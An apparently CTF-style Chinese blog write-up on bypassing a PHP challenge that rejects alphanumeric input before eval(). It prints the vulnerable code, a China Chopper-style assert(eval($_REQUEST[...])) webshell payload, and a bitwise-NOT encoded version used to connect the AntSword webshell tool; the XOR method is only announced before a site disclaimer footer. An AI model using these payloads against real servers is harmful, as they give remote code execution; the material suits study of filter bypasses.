<?PHP error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @eval($code); } else{ highlight_file(__FILE__); }
?>
在研究bypass之前,先研究一个问题:eval(变量)
test.PHP:
<?PHP $a=$_REQUEST[8]; @eval(8); ?>
想通过传参让页面输出PHPinfo的界面,第一种方法就是?8=PHPinfo(); ps:记得加分号
我尝试了以下?8=$_REQUEST[6];&6=PHPinfo() 是不行的,在网上看过一篇WP说eval是PHP的语法组成的一员,所以eval()括号里一定是一个PHP预定义语法,不能直接是一个变量,说明eval(变量)的时候,变量不能直接写$_REQUEST[8]
而是要写成菜刀流量的形式:
?8=assert(eval($_REQUEST[8]))&8=PHPinfo(); ?8=assert(eval(PHPinfo();))
assert()执行单行代码,eval()就是单行代码,经测试payload这样写是可行的。
继续看bypass问题:
法一:取反绕过:
<?PHP echo urlencode(~'assert'); echo urlencode(~'eval($_REQUEST[8])');?>
结果:
%9E%8C%8C%9A%8D%8B
%9A%89%9E%93%D7%DB%A0%AD%BA%AE%AA%BA%AC%AB%A4%C7%A2%D
试了一下,连接蚁剑是可以的,但是我的蚁剑访问不了远程仓库不知道是什么情况。
法2:异或绕过
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。